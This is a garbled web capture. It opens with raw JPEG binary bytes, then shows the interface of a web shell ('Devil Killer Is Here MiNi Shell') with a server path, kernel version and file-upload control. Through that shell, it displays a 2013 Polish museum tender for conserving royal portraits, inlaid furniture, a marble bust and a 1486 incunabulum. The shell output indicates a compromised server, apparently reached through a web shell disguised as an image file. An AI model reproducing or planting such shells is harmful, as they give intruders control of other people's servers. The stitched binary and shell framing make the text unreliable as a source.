JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130412/144710-N-2013.html

<p class="kh_header"><b>Przemyśl: 1. Wykonanie konserwacji i restauracji:
- zad. nr 1: 8 obrazów olejnych na płótnie, 6 ram złoconych, 1 srebrzonej i wykonanie 1 nowej srebrzonej ramy
- zad. nr 2: 2 mebli intarsjowanych
- zad. nr 3: 1 rzeźby kamiennej
- zad. nr 4: 1 inkunabułu
2. Wykonanie ekspertyz:
- zad. nr 5: sporządzenie  2 pisemnych ekspertyz dotyczących zad. nr 1
-  zad. nr 6: sporządzenie 2 pisemnych ekspertyz dotyczących zad. nr 2
- zad. nr 7:sporządzenie 2 pisemnych ekspertyz dotyczących zad. nr 3
na potrzeby MNZP realizującego projekt o nazwie Konserwacja muzealiów do rozbudowy wystaw stałych</b><br>
<b>Numer ogłoszenia: 144710 - 2013; data zamieszczenia: 12.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe Ziemi Przemyskiej - MNZP w Przemyślu , pl. płk. Berka Joselewicza 1, 37-700 Przemyśl, woj. podkarpackie, tel. 016 679 30 00, faks 016 679 30 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://muzeum.przemysl.pl/mnzp/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1. Wykonanie konserwacji i restauracji:
- zad. nr 1: 8 obrazów olejnych na płótnie, 6 ram złoconych, 1 srebrzonej i wykonanie 1 nowej srebrzonej ramy
- zad. nr 2: 2 mebli intarsjowanych
- zad. nr 3: 1 rzeźby kamiennej
- zad. nr 4: 1 inkunabułu
2. Wykonanie ekspertyz:
- zad. nr 5: sporządzenie  2 pisemnych ekspertyz dotyczących zad. nr 1
-  zad. nr 6: sporządzenie 2 pisemnych ekspertyz dotyczących zad. nr 2
- zad. nr 7:sporządzenie 2 pisemnych ekspertyz dotyczących zad. nr 3
na potrzeby MNZP realizującego projekt o nazwie Konserwacja muzealiów do rozbudowy wystaw stałych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia znajduje się na stronie Zamawiającego.

ZADANIE NR 1
Przedmiotem zamówienia jest:
Konserwacja i restauracja 8 obrazów olejnych na płótnie wraz z konserwacją i restauracją 6 ram złoconych, 1 srebrzonej i wykonaniem 1 nowej srebrzonej ramy, wykonanie badań konserwatorskich i specjalistycznych, wykonanie projektów konserwacji i restauracji 6 obrazów, sporządzenie dokumentacji konserwatorskiej pisemnej i fotograficznej przed, w trakcie 
i po konserwacji zgodnie z poniższymi wytycznymi; transport i retransport eksponatów 
wraz z ubezpieczeniem oraz ubezpieczenie eksponatów na czas składowania (konserwacji).

1. OBRAZ PORTRET MICHAŁA KORYBUTA WIŚNIOWIECKIEGO, malarz nieznany, Nr inw. MPS-59; Polska, Lwów (?), XVIII w. (?) przemalowany w XIX w.; płótno, olej; 93 cm x 72 cm , w ramie 112,5 cm x 91,5 cm .
Opis przedmiotu:
Portret króla Michała Korybuta Wiśniowieckiego. Portretowany w ujęciu do wysokości pasa, w niepełnym zwrocie w prawo, przy stoliku. Twarz króla o charakterystycznych rysach twarzy, w ciemnej peruce z długich loków. Król ubrany w pancerz, na który wyłożony jest koronkowy kołnierz. W prawej dłoni trzyma berło. Stolik nakryty draperią; widoczny fragment korony. Po lewej stronie portretowanego napis: MICHAŁ WISZNIOWIECKI ANO 1646. Kolorystyka: zimna szarość z akcentami różu i czerwieni. Na odwrociu napis: Restaurował 1888 Edward Ingarden.

2. OBRAZ PORTRET ZYGMUNTA III WAZY W STROJU SZLACHECKIM, malarz nieznany, Nr inw. MPS-60; Polska, Lwów (?), XVIII w. (?), przemalowany w XIX w.; płótno, olej; 92 cm x 72 cm , w ramie 111 cm x 91 cm .
Opis przedmiotu:
Portret króla Zygmunta III Wazy. Portretowany w ujęciu do wysokości pasa, na wprost, z lekkim przesunięciem na prawo, ubrany w strój szlachecki. Twarz o rozpoznawalnych rysach, okolona krótkim zarostem, włosy krótko przycięte. Ubranie stanowi fioletowy żupan i czerwona delia. Spod delii widoczna prawa dłoń złożona na pasie. Z lewej strony postaci napis: ZYGMUNT III JAGIELOŃCZYK. Kolorystyka: czerwień, fiolet, brąz, róż. Na odwrociu napis: Restaurował 1888 Edward Ingarden.

3. OBRAZ AUGUST II MOCNY KRÓL POLSKI, malarz nieznany, Nr inw. MPS-61; Polska, Lwów (?), XVIII w. (?), przemalowany w XIX w.; płótno, olej; 92 cm x 72 cm , w ramie 111 cm x 92,5 cm .
Opis przedmiotu:
Portret króla Augusta II Mocnego. Portretowany w ujęciu do wysokości pasa, na wprost, ubrany w pancerz. Twarz o charakterystycznych rysach fizjonomicznych, na głowie krótka peruka z białych włosów. Na pancerz narzucony niebieski płaszcz podbity gronostajem spięty dużą, owalna broszą, pod szyja widoczny fragment kołnierzyka. Z prawej strony napis: AUGUST II. Kolorystyka: niebieski, biały, szarości, akcenty różu i czerwieni. Na odwrociu napis Restaurował 1888 Edward Ingarden.
4. OBRAZ STEFAN BATORY KRÓL POLSKI, malarz nieznany, Nr inw. MPS-63; Polska, Lwów (?), XVIII w. (?), przemalowany w XIX w.; płótno, olej; 92,5 cm x 70 cm , w ramie 111 cm x 89 cm .
Opis przedmiotu:
Portret króla Stefana Batorego. Portretowany w ujęciu do wysokości pasa, na wprost, z nieznacznym przesunięciem w prawo. Twarz o charakterystycznych rysach fizjonomicznych. Portretowany ubrany w czerwoną delię z czarnym kołnierzem, spod której widoczne rękawy żupana; na głowie czapka batorówka z czarnego futra. W prawej dłoni fragment rękojeści szabli. Po prawej stronie napis: STEFAN BATORY. Kolorystyka: czerwień, czerń, brąz, róż, ugier. Na odwrociu napis Restaurował 1888 Edward Ingarden.
5. OBRAZ WŁADYSŁAW IV KRÓL POLSKI, malarz nieznany, Nr inw. MPS-64; Polska, Lwów (?), XVIII w. (?), przemalowany w XIX w.; płótno, olej; 92 cm x 72 cm, w ramie 111 cm x 90,5 cm .
Opis przedmiotu:
Portret króla Władysława IV. Portretowany w ujęciu poniżej pasa, w lekkim zwrocie w prawo. Twarz o charakterystycznych dla portretowanego rysach; włosy krótkie, opadające na kark, ciemne. Król ubrany w biały strój spodni, na którym żupan z nakładanymi koronkowymi rękawami i kołnierzem. 
Na szyi zawieszony Order Złotego Runa. Lewa ręka złożona na biodrze; widoczny fragment rękojeści szabli. Prawa oparta o stół, na którym leży korona. W tle, w prawym górnym narożu, orzeł oraz napis: WŁADYSŁAW 4 ANNO 1648. Kolorystyka: ugier, biel, róż, czerń, czerwień, szarości.; Na odwrociu napis Restaurował 1888 Edward Ingarden.

6. OBRAZ KAZIMIERZ WIELKI KRÓL POLSKI, malarz nieznany, Nr inw. MPS-62; Polska, Lwów (?), XVIII w. (?), przemalowany w XIX w.; płótno, olej; 92 cm x 72 cm , w ramie 111,5 cm x 91 cm .
Opis przedmiotu:
Portret króla Kazimierza Wielkiego. Portretowany w ujęciu do wysokości pasa, na wprost, z twarzą nieznacznie w lewo, na tle kotary. Twarz o charakterystycznej fizjonomii okolona długim, siwym zarostem; na głowie korona. Król ubrany w obszerny płaszcz, spod którego wystają ręce w zbroi. W lewej ręce król trzyma berło. Po prawej stronie napis: KAZIMIERZ WIELKI 1369. Kolorystyka: czerwień, brąz, biel, czerń. na odwrociu napis Restaurował 1888 Edward Ingarden.


7. OBRAZ PORTRET KOBIETY, malarz nieznany, Nr inw. MPS-52; Polska, koniec XVIII w.; płótno, olej; 63,5 cm x 45,5 cm .
Opis przedmiotu:
Portretowana w ujęciu do wys. pasa w niepełnym zwrocie w prawo. Twarz kobiety o wyrazistych rysach; na głowie wysoka peruka w ciemnym kolorze. Kobieta ubrana w suknię z dużym dekoltem. 
Do piersi przytula małego, białego pieska. Opis obrazu utrudniony ze względu na zły stan zachowania.

8. OBRAZ PORTRET DAMY DWORU, malarz nieznany, szkoła polska, Nr inw. MPS-786; Polska, (XVIII w.), kopia z XIX w.; płótno, olej; 81,5 cm x 63 cm .
Opis przedmiotu:
Portret Marii Józefy Habsburg (?). Portretowana w ujęciu poniżej pasa, na wprost, z twarzą w nieznacznym zwrocie w lewo. Twarz kobiety w średnim wieku, na głowie niewielka blond peruka z drobnych loczków. Na peruce klejnoty, w uszach kolczyki, na szyi sznur pereł. Ubrana w suknię i narzucony na nią szeroki płaszcz podbity gronostajem, spod którego widoczny zawieszony 
na czerwonej szarfie Order św. Katarzyny Męczennicy. 

ZADANIE NR 2

Przedmiotem zamówienia jest:
Konserwacja i restauracja (projekt i rekonstrukcja brakującego brakujących elementu elementów lub aranżacja w wyjmowanej, wewnętrznej części mebla z zespołem szufladek) intarsjowanej sekretery typu: secrétaire a abattant, oraz konserwacja i restauracja intarsjowanego łóżka, wykonanie badań konserwatorskich, sporządzenie dokumentacji konserwatorskiej pisemnej i fotograficznej przed, w trakcie i po konserwacji zgodnie z poniższymi wytycznymi; transport i retransport eksponatów wraz z ubezpieczeniem oraz ubezpieczenie eksponatów na czas składowania (konserwacji).

1. MEBEL, ŁÓŻKO Z HERBEM SAPIEHÓW LIS, 1770 - 1780 r., nr inw. H-91 MK, Polska (?); sosna, technika okładzinowa; intarsja okładzinowa; fornir orzechowy, klon - ptasie oczko (?); grusza (?) wym.: 93 cm x 145 cm x 200 cm .
Opis przedmiotu: 
Łóżko z herbem Sapiehów Lis. Łóżko zbudowane z dwóch wezgłowi o jednakowych wymiarach 
oraz boków - wkładu brak. Wezgłowia faliste: płyta lekko wygięta, poszerzona u dołu, wsparta 
na dwóch nóżkach w kształcie mocno spłaszczonych kul, nad którymi profilowana listwa pełniąca funkcje cokołu. Wezgłowie zamknięte listwą brzegową, lekko wystającą poza lico deski, w kształcie spłaszczonego łuku wklęsło-wypukłego. Wezgłowia zdobione pasami intarsji podkreślającymi kształt zwieńczenia oraz linie brzegowe, które wyodrębnione ciemnym konturem; wewnątrz jaśniejsze partie - na skraju pasa górnego, pośrodku bocznych pasów pionowych oraz po bokach pasa dolnego (w kształcie kwadratu o wklęsłej ściance wewnętrznej). Policzki wezgłowia poszerzone u dołu i ozdobione paskiem ciemniejszej intarsji podkreślającej kształt wezgłowia. Pośrodku pasa górnego intarsjowany herb Lis (ciemny) na jasnym polu. Boki łóżka również faliste i zdobione intarsją w postaci dwóch prostokątów, w których końcach kwadrat o wklęsłej ściance wewnętrznej. 
U dołu listwa cokołu jak przy wezgłowiach.
Program prac konserwatorsko-restauratorskich
1. Sporządzenie szczegółowej dokumentacji fotograficznej w siedzibie MNZP w Przemyślu. 
2. Zabezpieczenie, przed całkowitym oderwaniem od podłoża, odspojonych fragmentów intarsji przed transportem mebla do pracowni konserwatorskiej Wykonawcy.
2. Dezynfekcja. 
3. Wstępne oczyszczenie powierzchni z kurzu i brudu.
4. Szczegółowe rozpoznanie struktury mebla: konstrukcji, technik dekoracyjnych, materiałów (wykonanie badań konserwatorskich umożliwiających ich identyfikację). Dokonanie rozwarstwienia chronologicznego na materiały pierwotne i wtórne.
5. Na podstawie przeprowadzonych badań konserwatorskich, przygotowanie uszczegółowionego programu prac konserwatorskich i przedłożenie go do akceptacji przez Zamawiającego przed rozpoczęciem dalszych prac.
6. Usunięcie elementów wtórnych będących pozostałością po nieumiejętnie przeprowadzonych naprawach.
7. Naprawa osłabionych i zerwanych wiązań konstrukcji, rozłączonych spojeń, sklejenie pęknięć, usunięcie spękań, podklejenie odspojeń intarsji i uzupełnienie jej ubytków, rekonstrukcja 
brakujących gzymsów.
8. Usunięcie zabrudzeń i ( w zależności od wyników badań ) regeneracja lub usunięcie istniejącej powłoki lakierniczej ( politury).
9. Wykonanie retuszy malarskich i podbarwianie drewna.
10. Zabezpieczenie powierzchni warstwami wosku bądź warstwami politury (materiały wykończeniowe i sposób nakładania uzależnione od wyników badań weryfikujących datowanie mebla).
11. Konserwacja metalowych złączy zaczepowych.
12. Montaż. 
13. Wykonanie dokumentacji konserwatorskiej opisowej i fotograficznej przed, w trakcie 
i po konserwacji. 
2. MEBEL, SEKRETERA typu: secrétaire a abattant, 1820 - 1830 r., Nr inw. MPH-3517, Francja (?); dąb, sosna, intarsja okładzinowa; mahoń, klon (?), jawor (?), grusza (?), wym.: 151 cm x 104 cm x 45 cm . 
Opis przedmiotu:
Sekretera typu: secrétaire a abattant. Do wykonania konstrukcji mebla wykorzystano drewno dębowe i sosnowe, natomiast intarsję wykonano z gatunków drewna tj: mahoń, klon (?), jawor (?), grusza (?). Sekretera w kształcie szafki założonej na prostokącie o zaokrąglonych krawędziach, dwuczęściowa. Lica poszczególnych elementów składowych bogato intarsjowane stylizowanymi motywami roślinnymi. W części dolnej cokolik na płaskich nóżkach oraz trzy wysuwane szuflady nierównej wysokości. W części górnej opuszczana klapa biurkowa kryjąca sześć wewnętrznych szufladek; ponad klapą szuflada; całość nakryta nieco wystającym blatem. Lico cokoliku zdobione dekoracją złożoną z dwóch liści akantu i wici. Dolne szuflady zdobione jednakową intarsją o stylizowanych motywach roślinnych: pośrodku muszla na liściach akantu ujęta w ulistnione i ukwiecone wici. W każdej z szuflad osadzone po dwa okrągłe, mosiężne uchwyty. Klapa otwierana, obramiona; pośrodku kosz ze zwisającymi, delikatnymi kwiatami, nad którym unoszą się motyle. Wewnątrz, pośrodku, znajdują się drzwiczki z trzema szufladkami z każdej strony; wewnątrz, 
za drzwiczkami umocowana jeszcze jedna szuflada. Na drzwiczkach - bukiecik, na licach szufladek wić; w każdej szufladce mosiężny uchwyt. Nad klapą szuflada o nieco wygiętym ku górze licu zdobiona rogami obfitości i wicią roślinną. Na bokach, w obramionym polu wewnętrznym, ozdobny wazon z różnorodnymi kwiatkami, nad którym unosi się ptak; w górnej części w owalu skrzyżowane wici. Narożniki zdobione ukwieconą wicią roślinną, krawędź blatu - paskami. 
Program prac konserwatorsko-restauratorskich
1. Sporządzenie szczegółowej dokumentacji fotograficznej w siedzibie MNZP w Przemyślu.
2. Przed transportem mebla do pracowni konserwatorskiej Wykonawcy, zabezpieczenie odspojonych fragmentów okleiny.
3. Dezynfekcja. 
4. Wstępne oczyszczenie powierzchni z kurzu i brudu.
5. Szczegółowe rozpoznanie struktury mebla: konstrukcji, technik dekoracyjnych, materiałów (wykonanie badań konserwatorskich umożliwiających ich identyfikację).Dokonanie rozwarstwienia chronologicznego na materiały pierwotne i wtórne.
6. Na podstawie przeprowadzonych badań konserwatorskich, przygotowanie uszczegółowionego programu prac konserwatorskich oraz projektu dotyczącego rekonstrukcji lub aranżacji wyjmowanej, znajdującej się za klapą, wewnętrznej część sekretery i przedłożenie ich do akceptacji 
przez Zamawiającego przed rozpoczęciem dalszych prac.
7. Usunięcie elementów wtórnych będących pozostałością po nieumiejętnie przeprowadzonych naprawach.
8. Naprawa osłabionych i zerwanych węzłów konstrukcyjnych, sklejenie pęknięć, likwidacja szczelin, uzupełnienie ubytków drewna, podklejenie odspojeń intarsji, usunięcie spękań i uzupełnienie ubytków intarsji.
9. Rekonstrukcja (w przypadku znalezienia analogii) brakującego elementu/ów lub wykonanie aranżacji wyjmowanej, znajdującej się za klapą, wewnętrznej część sekretery zgodnie z zaakceptowanym przez Zleceniodawcę projektem. 
10. Rekonstrukcja zamków, kluczy, zawiasów, kluczyn, uchwytów oraz konserwacja zachowanych.
11. Montaż kluczyn.
12. Usunięcie zabrudzeń i ( w zależności od wyników badań) regeneracja lub usunięcie istniejącej powłoki lakierniczej ( politury).
14. Wykonanie retuszy malarskich i podbarwianie drewna.
15. Zabezpieczenie powierzchni warstwami politury bądź warstwami wosku (materiały wykończeniowe uzależnione od wyników badań weryfikujących datowanie mebla).
16. Montaż. 
17. Wykonanie dokumentacji konserwatorskiej opisowej i fotograficznej przed, w trakcie 
i po konserwacji. 

ZADANIE NR 3
Przedmiotem zamówienia jest:
Konserwacja i restauracja 1 rzeźby kamiennej, marmurowej, wykonanie badań konserwatorskich, wykonanie projektu rekonstrukcji rzeźby, sporządzenie dokumentacji konserwatorskiej pisemnej i fotograficznej przed, w trakcie i po konserwacji zgodnie z poniższymi wytycznymi; transport i retransport eksponatu wraz z ubezpieczeniem oraz ubezpieczenie eksponatu na czas składowania (konserwacji).
RZEŹBA, POPIERSIE MŁODEGO DIONIZOSA Z GAŁĄZKAMI BLUSZCZU WE WŁOSACH, A. Trippel, 
Nr inw. ZNr-753, Rzym, Włochy, 1786 r., marmur kararyjski, wym.: wys.55 cm x 42 cm x 40 cm .

Opis przedmiotu:
Popiersie młodego Dionizosa z gałązkami bluszczu we włosach. Głowa nieco pochylona i skręcona w lewą stronę. Twarz delikatna o otwartych oczach i rozchylonych ustach. Włosy długie, przedzielone na środku, podpięte nad uszami i opadające po bokach wężowatymi kosmykami na ramiona, 
zaś z tyłu upięte w węzeł i opuszczone na kark. Czoło przepasuje opaska. Po bokach głowy 
i nad skroniami biegną dwie gałązki bluszczu. Szyja i półkoliście wycięty tors są obnażone. Sygnowany. Na odwrociu, na brzegu wyryty jest napis: A. Trippel. Fe: in Rom 1786 .
Program prac konserwatorskich: 
1. Dezynfekcja powierzchni rzeźby po uprzednim przebadaniu charakteru występującej żółtej pigmentacji pod kątem mykologicznym. 
2. Wykonanie badań dotyczących rozpoznania charakteru przebarwień powierzchni marmuru 
ze względu na brak rozpoznania charakteru zaplamień proponuje się : usuwanie zaplamień 
za pomocą okładów charakteryzujących się dużą pojemnością wewnętrzną (nasiąkliwością) - 
- usuwanie zaplamień typu żelazistego 
- usuwanie zaplamień oleistych; zastosować okłady zmydlające 
Zabiegi wykonywać wielokrotnie do czasu uzyskania pożądanego efektu oczyszczenia. 
3. Na podstawie przeprowadzonych badań konserwatorskich, przygotowanie uszczegółowionego programu prac konserwatorskich i przedłożenie go do akceptacji przez Zamawiającego 
przed rozpoczęciem dalszych prac.
4. Oczyszczanie powierzchni przegrzaną parą wodną pod ciśnieniem z użyciem wody destylowanej przy pomocy wytwornicy pary. Znaczne zabrudzenia kamienia miejscowo wymagają wspomagania działaniem mechanicznym przy pomocy ścierniw o odpowiedniej miękkości wpływających w sposób obojętny na oczyszczaną powierzchnię. 
5. Wykonanie modeli dla rekonstrukcji: elementów pukli włosów, nosa, fragmentów stylizowanych liści oraz rekonstrukcji podstawy rzeźby (na podstawie analogii wykonanych popiersi tego artysty wskazanych przez Zamawiającego w Zaleceniach Zamawiającego), ze szczególnym uwzględnieniem dopasowania kształtu górnej części podstawy do formy istniejącego brzuśca popiersia i proporcji podstawy w stosunku do torsu. Należy wykorzystać gotowy otwór kotwiący znajdujący się 
pod spodem rzeźby do umocowania torsu na nowej podstawie. Materiał z którego będzie wykonana podstawa musi spełniać warunki obciążenia: rekonstrukcja w marmurze lub odlew żywiczny (kit) imitujący marmur, zamiennie. 
6. Sporządzenie kitu do uzupełnienia ubytków w marmurze na bazie nie żółknącej (światłotrwałej) żywicy z dodatkiem pigmentów. Masa w trakcie opracowywania na zabytku powinna być całkowicie neutralna i bezpieczna, zaś po utwardzeniu - odwracalna. Można przygotować kilka rodzajów zapraw różniących się zastosowanymi wypełniaczami. Przygotować próbki w różnych odcieniach 
oraz o zróżnicowanej przeświecalności. Rekonstrukcja brakujących elementów rzeźby (uzupełnienie ubytków formy rzeźbiarskiej) i rekonstrukcję podstawy można wykonać po zaakceptowaniu 
przez Zamawiającego projektu rekonstrukcji rzeźby tj. projektu przedstawiającego ostateczny wygląd rzeźby po konserwacji, przedstawionego przez Wykonawcę.
7. Zabezpieczenie końcowe powierzchni marmuru przy pomocy wosku mikrokrystalicznego i wypolerowanie. 
8. Montaż rzeźby z podstawą po wcześniejszym przygotowaniu w formie projektu propozycji sposobu zakotwiczenia rzeźby z podstawą, z podaniem zastosowanego do tego celu materiału.

ZADANIE NR 4
Przedmiotem zamówienia jest:
Konserwacja i restauracja 1 inkunabułu, wykonanie badań konserwatorskich, sporządzenie dokumentacji konserwatorskiej pisemnej i fotograficznej przed, w trakcie i po konserwacji zgodnie z poniższymi wytycznymi; transport i retransport eksponatu wraz z ubezpieczeniem 
oraz ubezpieczenie eksponatu na czas składowania (konserwacji).
INKUNABUŁ; Epistolae familiares, Listy papieża Piusa II; Nr inw. 7077; Norymberga; 1486 r.; papier, skóra, drewno bukowe, mosiądz; wym.: 24,5 cm x 17,5 cm x 4,0 cm .
Opis przedmiotu:
Przedmiotem planowanych prac konserwatorskich jest inkunabuł Epistolae familiares, Listy papieża Piusa II (Kazania Piusa) ze zbiorów Muzeum Narodowego Ziemi Przemyskiej w Przemyślu. Druk o wymiarach 24,5 cm wysokość, 17,5 cm szerokość, i 4,0 cm grubość grzbietu. Format bibliograficzny 4°. Wydrukowany został na dobrej jakości papierze czerpanym o kremowym kolorze. Liczy 248 kart. Druk w jednej kolumnie, zwarty. W tekście nieliczne dopiski i marginalia wykonane brązowym atramentem. Ozdobiony został ręcznie wykonanymi inicjałami czerwoną farbą prawdopodobnie cynobrem i czerwonym rubrykowaniem. W części druku brakuje inicjałów, zostały puste miejsca. Nieliczne inicjały wykonano brązowym atramentem lub farbą. Składki po 8 kart (4 karty złożone) zeszyte zostały na trzy podwójne sznurki mocną bardzo grubą nitką (sznurkiem) lnianym. Wyklejki, nie zostały doszyte do bloku, wykonane zostały z papierowych kart rękopiśmiennych zapisanych brązowym i czarnym atramentem. Zostały one doklejone do okładzin. Scyzury wykonano z pasków pergaminu z zapiskami atramentowymi. Oprawę wykonano z grubych 0,5 cm desek bukowych. Sznurki zwięzów przechodzą przez otwory w deskach. Oprawa skórzana zwarta naciągnięta została 
na drewniane okładziny. Oprawa skórzana zdobiona prostym, ślepym tłoczeniem w wydzielonych filetą przestrzeniach. W rogach wytłoczono tarcze heraldyczne, pośrodku wzór rombowy. 
Blok inkunabułu posiadał zapięcie, które służyło do zabezpieczania wnętrza przed kurzem, brudem i światłem. Szczelne zamknięcie książek zapobiegało również niszczeniu i wyginaniu zewnętrznych kart. Inkunabuł posiadał dwie klamry mosiężne. Na górnej okładzinie znajdują się dwie mosiężne zapinki a na dolnej umocowane były pierwotnie uchwyty zapinek zamocowane na paskach skórzanych przymocowanych do deski mosiężnymi blaszkami.
Program prac konserwatorskich:
1. Dezynfekcja inkunabułu 
2. Założenie dokumentacji konserwatorskiej opisowej i fotograficznej przed, w trakcie 
i po konserwacji. 
3. Na podstawie przeprowadzonych badań konserwatorskich i specjalistycznych, przygotowanie uszczegółowionego programu prac konserwatorskich i przedłożenie go do akceptacji 
przez Zamawiającego przed rozpoczęciem dalszych prac.
4. Częściowy demontaż bloku; pierwszych 2-3 składek i ostatnich 3 składek. 
5. Poddanie wymontowanych kart pełnej konserwacji: oczyszczenie mechaniczne, mycie z pełną kontrolą ręcznie wykonanych inicjałów (ewentualne zabezpieczanie żywicą przed zabiegiem mycia), chemiczne usuwanie zaplamień grzybowych, planirowanie Metylocelulozą, uzupełnianie maszynowo ubytków dobraną kolorystycznie masą celulozową, prasowanie, ułożenie w składki. 
6. Konserwacja pozostałego bloku inkunabułu; oczyszczanie mechaniczne, usuwanie miejscowe zacieków poprzez wypłukiwanie ciepłą wodą, prasowanie kart , uzupełnianie ręczne ubytków 
masą celulozową. 
7. Poddanie scyzur pergaminowych oczyszczeniu mechanicznemu, nawilżeniu w materiale typu 
Gore-tex i prasowaniu poprzez naprężanie. 
